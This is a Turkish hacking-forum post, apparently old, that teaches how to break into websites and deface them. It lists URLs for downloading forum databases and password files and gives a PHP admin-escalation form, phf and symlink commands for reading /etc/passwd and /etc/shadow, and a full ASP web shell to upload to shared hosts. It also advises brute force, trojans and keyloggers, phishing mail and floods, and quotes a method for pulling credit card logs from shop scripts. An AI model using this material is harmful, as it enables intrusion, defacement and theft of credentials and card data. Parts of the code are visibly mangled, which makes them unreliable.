Holigano
Forumdan Uzaklaştırıldı
- Katılım
- 2 May 2015
- Mesajlar
- 560
- Tepkime puanı
- 0
- Puanları
- 0
Bu Dökümanda Size Web Hackle ilgili Yararli Olduguna İnandigim Bilgileri Vereceğim.Bu Dökümanı Uygalamaya
Dökemeseniz Bile Bu İşlerin Mantığını Bir parca Olsun Anlayabilirsiniz.
Bir siteyi hacklemek için kullanabileceginiz birçok yöntem var.Bunlardan bazilari:
*Güvenlik Aciklari(asp,php,cgi,phf vb. gibi)
*Exploitler
*Fso(NtDaddy),listpathler
*Bruteforce
*Wordlist
*Birebir Baglanti(trojanlar vs)
*Fakemail
*Flood
Simdi bunlari teker teker inceleyelim:
_____GUVENLIK ACIKLARI:_____
Genelde baslicalari amatör olmak üzere bircok sitede güvenlik aciklari bulabilirsiniz.Özellikle hazir asp uyelik sistemi
kullanan siteleri,mesaj boardlarini ve forumlari bu aciklar yardimiyla hackleyebilirsiniz.
Ornek olarak Webwiz forumlarini ele alalim:
forumunadresi.com - forumunadresi Resources and Information. This website is for sale! olarak deneyin.Eger ana database e ulasirsaniz ki eger forum yeni kurulmussa
bu fazlasiyla mümkün,gerekli sifreleri alabilirsiniz(admin ifrelerini).(sifreleri acmak icin access kullanabilirsiniz)
Snitz forumlarda da ayni islem mümkün.Mdb ye
http://www.forumadresi.com/snitz_forums_2000.mdb adresinden ulasabilirsiniz.
son olarak asp nuke sistemlerde
http://www.siteadresi.com/db/main.mdb den database'e ulasabilirsiniz.
Söyledigim gibi sitede hazir üyelik portali kullaniliyor olabilir;
bunlari aspindir.com dan bakin.Eger aynisi kullanilan bir portal görürseniz portalin upload edilmeden önceki klasör yoluna
bakin.Böylece mdb nin nerede oldugunu bulabilirsiniz.Büyük ihtimalle bunlar
/db/main.mdb
/db/uyeler.mdb
/db/members.mdb
/db/sifreler.mdb gibi
Bir sitedeki sizin bulamadiginiz muhtemel aciklari tespit edebilmek icin güvenlik tarayicilarini kullanmanizi öneririm.
Bu tarayicilardan en yaygin olanlari
.N-Stealth
.Whisker
.Retina
.twwwscan
.m3hm3t's CGI scanner'dır.
Php Sistemlerinin aciklari:
Size maillistlerdeki maillist acigini kullanabiliriz.Herhangi bir sitede bulunan maillist linkinin sonuna
/ml_config.dat ekLeyerek admin şifresine uLaşabiLirsiniz.
bi de örnek olsun die artik kalmayan php2.0.0 forumlarindan bir acik vermek istiyorum.Özellikle aciklarin mantigini
anlamaniza yardimci olacagina inaniyorum.
<form method="post" action="http://forum sayfası/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</body>
</html>
Cgi scriptleri acigi:
WEBBS de bulunan bir acik.
http://www.hedefsite.com/cgi-bin/webBBS/profiles/ ya da http://www.hedefsite.com/cgi-bin/webBBS/users/
Webadverts(reklam) acigi:Siteye konan reklamlarin hepsi icin ayri hesap acilir.
Siteye kendi bannerinizi koyup diger bannerlari kaldirabilirsiniz.
Açık : http://www.hedefsite.com/cgi-bin/advert/adpassword.txt
WWWBoard Scriptleri:
Açık : http://www.hedefsite.com/cgi-bin/wwwebboard.txt
Açık : http://www.hedefsite.com/cgi-bin/wwwboard.txt
Açık : http://www.hedefsite.com/webboard/password.txt
Biraz da phfden bahsetmek istiyorum:
96'da FBI web sitesini hacklemekte kullanilan acik hala bagzi sitelerde bulunmaktadir.Size bu aciktan örnekler verecegim:
http://kiracagimizadres/cgi-bin/phf...0a/bin/cat /e tc/passwd yaziyoruz browsera.ENTER dedigimizde
error 404 gelirse bu acik kapanmistir demektir.Eger kapanmamissa karsiniza gelebilecek 2 türlü secenek var.Ya direk
passwordlerle birlikte userlari görürsünüz ya da userlarin passwordleri * biçiminde shadowed password olarak görünür.
Örnek vermek gerekirse:
www-admin:SIFRE:100:11:WWW administrator:/home/Common/WWW:/bin/csh
yada
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
gibi.En azindan denemekte yarar oldugunu düsünüyorum.Burada www-admin yerine herhangi bir kullanici adi da yazabilir.
_____EXPLOıTLER:_____
Çok kullanicili isletim sistemlerinde,sitelerde size bir boslugu kullanarak özel yetkiler vermek icin yazilan programlara
exploit adi veriyoruz.Exploit bize belirli bir sistemde yöneticilik ünvani verir.Bu ünvanlar NT'de administrator,Novell'da
supervisor,UNIX de clone yada root olarak siralanabilir.ıki tür exploit bulunur bunlar remote(sistemin parcasi olmadan
kullabileceginiz exploitler) vede local(kullanmak icin sistemin bir parcasi olmaniz gerekenler) olarak siralanabilir.
Exploitler , sistemde ki buglar sayesin de r00t seviyesine çıkabilmek için yazılmış programlardır.
Bagzi örnek exploitler vermek istiyorum :
"overflow" exploiti (FreeBSD'de lprm açığı):Overflow exploitler SecuriTeam.com - A Free Accurate and Independent Source of Vulnerability Information adresinde tht bulunmaktadir.Pointer
artimetiğini kullanarak (Pointer değişkenler değişkenin içindeki bilgiyle birlikte bellek adresini de tutarlar) tampon
belleğe (buffer) bir string kopyalayarak taşma oluşturur. Sistemdeki lprm komutunu kullanır. lprm komutu uzaktaki bir
yazıcıya gönderilen bir işi iptal etmeye yarar. "lprm -P bloggs" komutuyla iş iptal edilebilirken kuyruktaki ikinci bir
iş aynı anda "lprm -P bloggs bloggs" la iptal edilebilir. Bu da buffer owerflow hatası meydana getirir. Bu sayede "root"
erişimi sağ..ır. Lokal bir exploittir.
Derleyici ve /tmp Hataları (Solaris'de gcc tempfile açığı): Gcc derleyicisinin 2.7.2.x ve önceki sürümlerinde
/tmp dizinine (geçici işlemlerin yürütüldüğü dizin. Windows dizini altındaki temp dizini gibi) sembolik link
(bir dosyaya ya da dizine ulaşabilmek için konan linkler. Windows'taki .lnk dosyaları gibi) oluşturulur ve bu
linkten yararlanarak lokal root hakkı alınır.
Program Hataları (Linux'daki X11Amp Programı açığı): X11Amp çalıştırıldığında ~./X11amp isminde bir dosya oluşturur.
Bu hatayı linux'ta şöyle kullanabilirsiniz:
mkdir ~/.x11amp
ln -s /etc/shadow ~/.x11amp/ekl
Bu komutları yazdıktan sonra X11Amp'i çalıştırıp "ekl" 'yi seçin bütün girişleri seçip silin. Program çakılacak ve
/etc/shadow dosyasını alabileceksiniz.
Microsoft'un FrontPage Server Extensions'unda karşılaşı.. açıklar: Frontpage extensions'un kullanıldığı web sitelerinde
pek çok açık bulmak mümkün, örneğin Frontpage 98'de dizin erişim hakları iyi düzenlenmediği için _vti_pvt dizini
"WORLD WRITABLE" olarak düzenlenmiş. _vti_pvt dizininde ise "service.pwd" dosyasında şifreler tutulmakta
Exploit uygulamali kullanimi icin size ayrica bir döküman hazirlayacagim
_____FSO(NTDADDY),LISTPATH:______
Çoğumuz elmali şeker yada sadece şeker diye tanidik.Bir hostta kiralanan bir yere upload edilen bir asp kodudur.Bize Hosttaki tüm
domainlere erişim hakki saglar.Piyasada bir çok FSO kodu bulabilirsiniz.Belesh domain ve hostlarda bosuna denemeyin ise
yaramaz.Yeni listhpathler icin sık sık hack sitlerini ziyaret etmenizi öneririm.Çok yakinda üzerinde oynamalar yaptigim
süper bi şekeri da piyasaya sürücem.Simdilik bekleyin.Bu methodun bütün hostlarda calismasi konusunda
garanti veremem.Ama size su an icin kullanabileceginiz bir kac FSO kodunu cok yakinda sitede yayinlayacagim.Buna özel
ayri bir döküman da sitemizde mevcuttur(by alca.).
Örnek bir Fso kodu yaziyorum.Su an Calisip calismadigindan emin degilim ama ileri derecede asp biliyorsaniz isin
mantigini kaparsiniz
<%@ Language=VBScript %>
<%
Option Explicit
Dim giCount
Dim gvAttributes
Dim Ext
Dim ScriptFolder
Dim FolderPath
Dim FileSystem
Dim Drives
Dim Drive
Dim Folders
Dim Folder
Dim SubFolders
Dim SubFolder
Dim Files
Dim File
Dim BgColor, BackgroundColor,FSO
If Request.QueryString("CopyFolder") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSEDITTEDopyFolder Request.QueryString("CopyFolder") & "*", "d:"
End If
If Request.QueryString("CopyFile") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSEDITTEDopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"),
"d:"
End If
Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")
FolderPath = Request.QueryString("FolderPath")
If FolderPath = "" Then
FolderPath = Request.ServerVariables("PATH_TRANSLATED")
End If
FolderPath = ParseFolder(FolderPath)
ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLAT ED")) & "images"
%>
<html>
<head>
<title>Remote Explorer</title>
<style type="text/css">
BODY
{
BACKGROUND-COLOR: ?#?C0C0C0?
FONT-FAMILY: 'MS Sans Serif', Arial;
FONT-SIZE: 8px;
MARGIN: 0px
}
TD,INPUT,SELECT
{
FONT-FAMILY: 'MS Sans Serif', Arial;
FONT-SIZE: 8px;
}
.Address
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: 1px center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
.Go
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: left center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
</style>
</head>
<body bgcolor="#c0c0c0">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<form>
<td width="1%" nowrap>
<select name="FolderPath" id="Drive">
<%
Set Drives = FileSystem.Drives
For Each Drive In Drives
Response.Write "<OPTION value=""" & Drive.DriveLetter & ":"""
If InStr(UCase(FolderPath), Drive.DriveLetter & ":") > 0 Then Response.Write "
selected"
Response.Write ">"
Response.Write Drive.DriveLetter & " - "
If Drive.DriveType = "Remote" Then
Response.Write Drive.ShareName & " [share]"
ElseIf Drive.DriveLetter <> "A" Then
If Drive.IsReady Then
Response.Write Drive.VolumeName
Else
Response.Write "(Not Ready)"
End If
Else
Response.Write "(Skiped Detection)"
End If
Response.Write "</OPTION>"
Next
%>
</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
</td>
</form>
<td width="1%"> Address: </td>
<form>
<td width="100%">
<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>"
style="width:100%">
</td>
<td width="1%">
<input class="Go" type="submit" value="Go"style="border:1px outset">
</td>
</form>
</tr>
</table>
<%
Set Folder = FileSystem.GetFolder(FolderPath)
Set SubFolders = Folder.SubFolders
Set Files = Folder.Files
%>
<br>
<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center"
style="border:1px inset">
<tr>
<td width="40%" height="20" bgcolor="silver"> Name</td>
<td width="10%" bgcolor="silver" align="right">Size </td>
<td width="20%" bgcolor="silver">Type </td>
<td width="20%" bgcolor="silver">Modified </td>
<td width="10%" bgcolor="silver" align="right">Attributes </td>
</tr>
<%
If Not Folder.IsRootFolder Then
BgToggle
%>
<tr title="Top Level">
<td bgcolor="<%=BgColor%>"><a href=
"<%=Request.ServerVariables("script_name")%>?F olde rPat h=<%=Server.URLPathEncode(Folder.Drive
& "")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%BgToggle%>
<tr>
<td bgcolor="<%=BgColor%>"><a href=
"<%=Request.ServerVariables("script_name")%>?F olde rPat h=<%=Server.URLPathEncode(Folder)%>"><font
face="wingdings" size="4">¶</font> Up One Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%
End If
For Each SubFolder In SubFolders
BgToggle
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href=
"<%=Request.ServerVariables("script_name") & "?FolderPath=" &
Server.URLPathEncode(FolderPath & SubFolder.Name & "")%>"><font face="wingdings"
size="4">0</font> <%=SubFolder.Name%></a> (<a href=
"<%=Request.ServerVariables("script_name")%>?C opyF olde r=<%=Server.URLPathEncode(FolderPath
& SubFolder.Name)%>&FolderPath=<%=Server.URLPathEnco de(FolderPath & "")%>">Copy</a>
</td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModi fied%> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)% > </td>
</tr>
<%
Next
For Each File In Files
BgToggle
Ext = FileExtension(File.Name)
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href=
"showcode.asp?f=<%=File.Name%>&FolderPath=<%=S e rver.URLPathEncode(FolderPath)%>"
target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a> (<a
href=
"<%=Request.ServerVariables("script_name")%>?C opyF ile= <%=File.Name%>&FolderPath=<%=Server.URLPathEnco de(FolderPath
& "")%>">Copy</a> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte </td>
<td bgcolor="<%=BgColor%>"><%=File.Type%></td& amp; gt;
<td bgcolor="<%=BgColor%>"><%=File.DateLastModified% ></td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></ td>
</tr>
<%Next%>
</table>
</body>
</html>
<%
Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal
MinUpperBound, ByVal IndexSeperator)
Dim lsResult
Dim llTemp
Dim giCount
MaxValuePerIndex = MaxValuePerIndex + 1
Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex
- 1)
MinUpperBound = MinUpperBound + 1
Loop
For giCount = MinUpperBound To 0 Step -1
llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
lsResult = lsResult & CStr(llTemp)
If giCount > 0 Then lsResult = lsResult & IndexSeperator
SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
Next
ConvertBinary = lsResult
End Function
Private Sub BgToggle()
BackgroundColor = Not(BackgroundColor)
If BackgroundColor Then
BgColor = "?#?efefef?"
Else
BgColor = "?#?ffffff?"
End If
End Sub
Private Function Attributes(AttributeValue)
Dim lvAttributes
Dim lsResult
lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
If lvAttributes(0) = 1 Then lsResult = "ReadOnly "
If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden "
If lvAttributes(2) = 1 Then lsResult = lsResult & "System "
If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive "
Attributes = lsResult
End Function
Private Function FileExtension(FileName)
Dim lsExt
Dim liCount
For liCount = Len(FileName) To 1 Step -1
If Mid(FileName, liCount, 1) = "." Then
lsExt = Right(FileName, Len(FileName) - liCount)
Exit For
End If
Next
If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
lsExt = ""
End If
FileExtension = lsExt
End Function
Private Function ParseFolder(PathString)
Dim liCount
If Right(PathString, 1) = "" Then
ParseFolder = PathString
Else
For liCount = Len(PathString) To 1 Step -1
If Mid(PathString, liCount, 1) = "" Then
ParseFolder = Left(PathString, liCount)
Exit For
End If
Next
End If
End Function
%>
Misafir
Genel Bilgiler
Posts
n/a
Threads
13732
_____Brute Force:_____
Bu teknik icin öncelikle dua edin ki ftp sifresi az haneli olsun.Brute force icin kullanabileceginiz program Brutus AET2 dir
ki bu tuzakonline.com'da mevcuttur.Brute force un mantigi cok basittir.Brutus olabilecek kombinasyonlari cok hizli bir
sekilde dener.Ama bu özellikle sifre cok haneliyse ki muhtemelen öyledir,çok uzun zaman alir.Başariya ulasma olasiligi
düşük olsa bile buldugu sifre nin calismama olasiligi yoktur .Size FTP sifresini verir.Buldugunuz sifre ile bence tüm
dosyalari silin kendi hazirladiginiz indexi koyun.
_____Wordlist:_____
Wordlistler icinde bir cok sözcügün bulundugu basit dosyalardir.Siz brute forcerlarla cok hizli bir sekilde elinizdeki
wordlistteki kelimeleri denersiniz.Wordlistler tahminen 5-10 bin kelimeden olusurlar ve eger elde etmeye calistiginiz ftp
sifresi bu wordlistler icindeyse sifreyi bulursunuz.Basariya ulasma olasiligi düsüktür.uldugu sifre nin calismama olasiligi
yoktur
_____Birebir Baglanti(trojanlar vs):_____
Lamer teknigidir bastan söylemem gerekli .Sitenin sahibiyle kurdugunuz basarili bir muhabbet sonucu elinizdeki trojan
serverini bence bir dosya ile birlestirip karsinizdaki kullaniciya yollayin.Site sahibinin makinasina baglandiktan sonra
bilgisayarina bir keylogger atin.Belirli araliklarla bilgisayarina girip log dosyasini kendi bilgisayariniza cekin.
Arada sitesinin passwordunu bulabilirsiniz.Bir diğer yöntem de Turkojan kullanarak mümkündür ki o daha saglikli dir.
Adamin bilgisayarina baglanip keyloggera calistirin .Sonra onunla sohbet edip bir sekilde sitesine ftp den erismesini
saglayin.Nasilsa sifresini girecektir.Sifresizce
not:Adamin sifreleri bilgisayarindaki password managerlarda kayitliysa yöntem basarisiz olur .Zaten eger basarili bir
webmastersa büyük ihtimalle serveri yemez .Site HTML falansa acik kullanamiyorsaniz deneyeblirsiniz.
_____Fakemail:_____
Selamlar.Mail site sahibi bakimindan büyük önem tasir.Genelde kullanilan Lame teknik adamin mailini hackleme hosttan sifre
istetmektir.Yine de denenebilen opsiyonlar arasindadir.Siteye Whois Cekip client maili(webmaster) hacklemeye calisin.
Hotmail,yahoo,usa.net,mynet fakemail kodlarini asagi yukari köklü her forumdan kolayca telep edebilirsiniz.ıcine lycostan bi
mail form kodu koyarsaniz rahatca adama fake atabilirsiniz.Fakat eger adamin maili POP3 falansa ki eger
webmasteradi@siteninadi.com ise muhtemelen öyledir tavsiyem kendi fake kodunuzu yazmanizdir.
____Flood:_____
Herhangi bir sunucu yada siteye kisa bir sürede cok fazla sayida account acarak yada mesaj göndererek o sunucu yada siteyi
servis dişi birakma teknigidir.HolyOne denyo launch forumlara clone sokarak flood yapmak icin birebir.Admiral programi
irc vs sunuculara kolaylıkla flood yapabilir.Bu teknigi birden fazla kisiyle,iyi bir internet baglantisiyla kullanmanizi tavsiye ederim
Yazıma başlamadan önce size bazı gerçeklerden bahsetmek istiyorum. Özellikle gerçekten bilimsel anlamda bilgisayar sektörü ile ilgilenmemişseniz, bu söyleyeceklerim sizin için altın değerinde olacaktır.
1. Kural : Hiçbir Hacker yada Saldırgan, sihirbaz değildir. Bir şekilde var olan bir açık varsa, o saldırgan, bilgi, yetenek, tecrübe ve şans kriterleri ile o açığı bulur ve kullanır. Her saldırganda bu kriterler aynı olmayacağı için bazıları için atak başarısız olur, bazılar için ise atak karşı tafa büyük hasarlar verir.
2. Kural : Tamamiyle güvenli sistem diye birşey yoktur.
3. Kural : Güvenlik işinde garanti yoktur.
Bu kurallar gerçekten altın niteliğinde. Eğer ki bunların doğru olduğunu bilerek düşünürseniz, yaptığınız işlerde ve yapacağınız yorumlarda bir çok şeyi kolayca elde edersiniz.
ınternet ortamı, bir çok bilgisayarın, farklı protokoller üzerinden birbirine bağlandığı, büyük bir paylaşım ağıdır. Bunu söylememin sebebi, satırlarımı doldurmak için değil. Burdaki önemli bir şeyi vurgulamak içindir. Az önceki cümlede “Paylaşım” denilen birşeyden bahsettim. Evet, ineternette bulunan her bilgisayar bir paylaşım içindedir...
şimdi kısaca internette bir web sitesi için gereken birimlerden bahsedeceğim.
Domian Name: Alan adıdır. Örneğin, Confidentialité- France bir Top-Level domaindir. “Spymastersnake.org” kısmı domainin adıdır. *.org kısmı domainin hangi level olduğunu belirtir. http://www.* kısmı ise, domainin gösterdiği Ipdeki www klasör veya hizmetinin yoludur. Domain Name her zaman bir Ipnin yerini alır. Bu IP ise bir bilgisayara ait olan, ve o bilgisayarın internete erişimini sağlayan numaradır. Her internete bağlanan makinaya verilen ve birbirinden farklı olan bu numaraya, internet protokolü numarası denir.
Host: ınterenete sürekli bağlı olan, belli bir ipsi olan ve içinde internette yayınlanacak dosyaları barındıran, multi-user işletim sistemi barındıran ve farklı kullanıcıların, biribirinden bağımsız kullanabilecekleri bir bilgisayardır. Eğer siz kendi bilgisayarınıza bu işletim sistemlerinden birini kurup, makinanızı ayarlarsanız bu makine sizinki bile olabilir.
Bu makinalarda web sunucusu dediğimiz programlar bulunur. Bu programlar sayesinde sizin herkese paylaşıma açacağınız internette yayınlayacağınız sitenin dosyalarını 80 numaralı port üzerinden yada başka bir port üzerinden web tarayıcılarının okuyabileceği şekilde yayınlanabilir.
Bir web sitesi aldığınızda, aldığınız yer size bir bilgisayarda hesap açar. Bu hesap sizin dosyalarını koyabileceğiniz bir hesaptır. Bu hesap sayesinde size izin verilen şeyleri yapabilirsiniz. Örneğin izin verilen miktarda dosyalarınızı koyabilir, yayınlayabilir veya karşı makinede dosyalarınızı çalıştırabilir, irc server gibi şeyler kurabilirsiniz. Yada şu anda geocities gibi yerlerin yaptığı sadece dosyalarınızı depo edip, yayınlanmasını sağlayabilirsiniz. Yani bu web yayımcılığının en temel ve basit işini yapmış olursunuz.
Ancak web yayımcılığı daha karmaşık ve daha çok şekilde yapılabilmekte. Bunları sağlayan şeylerin başında script dediğimiz, web browserlarından yollanan komutlarla karşı makinada çalışan uygulamalardır. Bir script, sınırlandırılmış bir *.exe uygulaması gibi çalışır. Belli bir yorumlayıcısı vardır ve tüm görevleri bu yorumlayıcı yapar. Scriptte ise bu yorumlayıcının anlayacağı komutlar vardır. Bu yüzden yaptığınız uygulamanın sınırları bu yorumlayıcının yeteneklerine bağlıdır. Bilinen en yaygın yorumlayıcılar ASP, PHP ve Perl yorumlayıcılarıdır.
Aynı şekilde size verilen bir hesapta, bazı normal *.exe uygulamaları yada ortamına göre sadece uygulama çalıştırabilir, bunlarla oyun serverları, chat serverları kurabilirsiniz. Elbette bu aldığınızın hostun yeteneklerine bağlıdır.
Böylece internete bağlı bir bilgisayarı bazı server uygulamaları sayesinde internette bilgi paylaşabilen bir sistem haline getirip, adına web sunucusu yada host demiş oluyoruz. Bir host içinde yüzlerce kullanıcı ve buna bağlı olarak yüzlerce web sitesi barındırabilir. Bunun böyle olması sağlayan şey ise Domain Name Server dediğimiz sistem ve Multi-User dediğimiz, işletim sistemleridir.
Kısaca bilmeyenler için, bir web sitesi için gereken bir server yazılımı ve internete bağlı bir bilgisayar diyebiliriz. Ancak gerçekte durum daha Complex bir haldedir. Bu complex yerleşim ise bu sistemleri iyi bilen kişiler için bazı avantajlar sağlamakta ve başkasının sahip olduğu sistemlere bile onların istemleri dışında hükmetme şansı vermektedir.
şimdi kısaca şu anda Türkiye’de Hack adı altında dolaşan, insanların Hack ettim diyerek övündüğü basit ve karmaşık olmayan sistemleri açıklamakta. Bunların başlıcaları şunlardır:
Mass Scannerlar: En yaygın olanı son dönemde budur. Bazı scannerlar, internetteki ipleri yani bilgisayarları tarayarak, onların paylaşım izni olup olmadığını ve ftp gibi protokolllerinde erişim izinlerine Anonymous kullanıcılara izin verip vermediğini kısa zamanda tarayıp bulan scannerlardır. Netbios ve Vulnerability scanner diye bir kaç türleri vardır. Kullanıcının bilgili biri olması gerekmez. Tek yapacağı ip aralığını girip tarama yapmasıdır. Aynı şekilde scriptlerdeki açıkları ve hataları bulmak hazırlanmış scannerlarda vardır. Bunlarla mesela, internette bulunan Alış-Veriş scriptlerinin bilinen açıkları veya Permission ayarları hatalarıyla kredi kartları bilgilerine ulaşım yapılmaktadır. Oldukça kolay ve basit birşeydir. Bir mass scanner çok iyi Up ve Down stream bağlantıya ihtiyaç duyar. DSL ve Tx bağlantılar biçilmiş kaftandır.
Eğer internette gecede 100-200 site hack ettik yada saatte 1000 site hack ettik gibi şeyler görürseniz, bunların Mass toolarla sadece butonlara basılarak yapıldığını rahatlıkla söyleyebilirsiniz. Özellikle bu hack edilen sitelerin bir ortak yanı olmaz. Diğelim bu 1000 siteyi hack etmiş adama 1 site adresi verseniz onu hack edemediğini görebilirsiniz. Çünkü kendi rastgele belli ip aralıklarını tarayarak bu işi yapmıştır, belki hack edilen sitelerin adını kendi bile daha önceden duymamıştır. Diyelimki sadece Amerikan sitelerini hack edicek biri, Amerikan hostlarının bulunduğu ve bulunabileceği, belli Amerikan IP aralıklarını tarama yapar ve içinde açıkların olduğu siteleri bularak işlemi yapar. Böylece saatte bağlantı hızına göre 1000 Amerikan sitesi hack edebilir. Ancak bu sitelerin çoğu uyduruk kişisel siteler olacaktır yada kendi çabasıyla hosting hizmeti vermeye çalışan deneyimsiz insanların siteleri olacaktır.
Başka bir şekilde de saatte yüzlerce site hack etmek mümkündür. Bunun için atak yapan şahıs, içinde yüzlerce hesabın bulunduğun bir Host’un açığını bulup, Root, Admin konumuna yada yetki düzeyi olacak bir konuma erişmiş ise tüm hesapları kitleyebilir yada hesapların indexlerine erişim varsa, hazırlayacağı ufak bir uygulama ile tüm indexleri değiştirebilir. Diyelim ki permission ayarları yapılmamış ve tüm kullanıcılarının Home klasörleri chmod 777 gibi bir izinle hazırlanmış bir hostta, açacağınız yada alacağınız bir hesapla, bir script yazmanız yada hostun işletim sistemine göre bir uygulama yazmanız sonucunda, tüm klasörlerdeki indexleri değiştirip, sistemi hack edilmiş havasına sokabilirsiniz. Bu işi eğer hostta 1000 site varsa, hepsine yapmış ve aynı anda yüzlercesini hack etmiş olursunuz... Bu verdiğim örnek bile en azından yetenek isteyen bir örnektir ancak yukarıda verilen tool örneği herkesin yapabileceği ve hali hazırda tüm hack sitelerinin kullanıcıların gözünü boyamak ve kendilerini tatmin etmek için kullandıkları yöntemdir. Bilgisayar bilimi hakkında bilgisi olmayan kişiler ise bu insanların arkasından gitmeye çalışmakta ve onların ağlarına düşmektedirler. Unutmayın ki bu iş sihirle yapılmıyor. Size mantığı açıklanmamış hiçbir hack girişimini gerçek sanmayın.
Fake Yollarla: Özellikle bedava siteler dağıtan geocities gibi yerlerden sitesi olan kişilerin sitelerini çalmak için kullanı.. yöntemdir. Kişinin mail adresine sahte şifre isteyen mailler yollanır yada user’ın hesabında şifreler denenir. Hiç bişey yapamayan lamer siteyi şikayet etmekte bulur çareyi. Eğer User ile bir chat ortamında bağlantısı varsa ona bir Trojan yada Keylogger yollayarak şifreyi almaya çalışır. ınternet kafe gibi ortamlarda user ve oturduğu makineleri takip ederek şifreyi almaya çalışır. Buda çok kullanı.. bir yöntem. Her zamanki gibi bilgisayar bilimi ile ilgisi olmayan kişilerin yolu veya karşısındaki user’ı bilgisi az olunca denen yoldur.
Script Açıkları: Bilinen scriptlerin açıklarıyla, sistemdeki bir şifreye ulaşarak yapı.. yöntemdir. Örneğin bir forum scriptinin admin şifresini ele geçirip, bu şifreyle sistemin diğer yerlerine ulaşıp, forumun anasayfasını değiştirme, şifre FTP şifresiyle aynı ise siteyi ele geçirme gibi, bilinen ve hala kullanı.. yöntemlerdir. Bunlar için bir örneği 2001 yılında yazıp yayınladığım kredi kartlarının çalınması ile ilgili bir yazıdan alıntı yaparak vermek istiyorum bu örnek Permission açıkları ile ilgili bölüm içinde geçerlidir.:
------------------------------------------------------------ ------------------
“..........ışte Log Kurulumlarından doğan açıklardan çıkan riskler...
Bu yöntemde zor olan tek bir yer var o da CClerin hangi program tarafından alınıp log edildiğini bulmak. Programı bulduktan sonra ise ona bazı parametreler girerek onun log dosyasını bulmak. Zor değil, kolay. Bazı web siteleri bile bu yöntemlerle hack ediliyor. Yapılması gereken şey scripte bazı parametreler girerek istenene ulaşmak.
şimdi, ilk iş kıytırık ama CC ile alışveriş yapı.. bir site bulmak ve bu sitenin CC verilerinin girildiği alana gitmek. Karşınıza CClerin girildiği form alanı gelince kaynağı görüntüleyip, içindeki POST methodunun bulunduğu yere bakın. Diyelim ki şu an zaten çalışan ve aktif olan Hire Workers Online! linkini POST verisinin yollanacağı yerde buldunuz. ışte o zaman bu durumda şans dileyip şunları deneyin:
Orda yazan URLyi kopayalaın, eğer URL yerinde "/cgi-local/shopper" yazıyorsa başına sitenin adresini koyun, yani Hire Workers Online! daha sonra URLyi browserınızın git çubuğuna yapıştırın. şimdi LOG'u bulmaya çalışcaz, ilk önce bu adrese şu TAGları ekliycez, Hire Workers Online! bu sayede scriptten bir arama yapmasını istiycez. Tabii ki arıycak ama ne? tabii ki ufak bir keyword, arama yapmamızın nedeni, log'u görüntülemek için başka şansımızın olmaması. Çünkü log'u print edecek bir girdi giremiyoruz, bunun için her zaman otomatik print yapan search tagını kullanıyoruz.
Bunun üstüne bir keyword girdisi ve üstüne de aranacak harfleri giriyoruz Hire Workers Online! ye şu an yeye yazdık ve yeye kelimesini aratmaya başladık ama nerde; Bunun için asıl karışık olan kısmı yapıcaz ve yapı.. alışverişlerin nerede LOGlandığını bulucaz. ışte bu durumda devreye zeka giriyor ve denemeye başlıyoruz.
Hire Workers Online! ye%20&template=sales.log diyoruz. Burdaki %20 boşluk anlamına, template ise aranacak kütüphane anlamına geliyor ve tabii ki sales.log ise aranacak olan döküman. Deniyoruz ve tabii ki olmuyor çünkü sales.log yok. O zaman devam ediyoruz ve oraya sales.log yerine sale.log yazıyoruz deniyoruz, olmazsa sell.log yazıyoruz, olmazsa order.log yazıyoruz ve tatam, oldu ışte bütün log karşınızda, yada şöyle diyim, bütün log değil yanlızca içinde yeye kelimesi olanlar karşınızda... Yukarda anlatılırken kullanı.. taglar değişebilir.
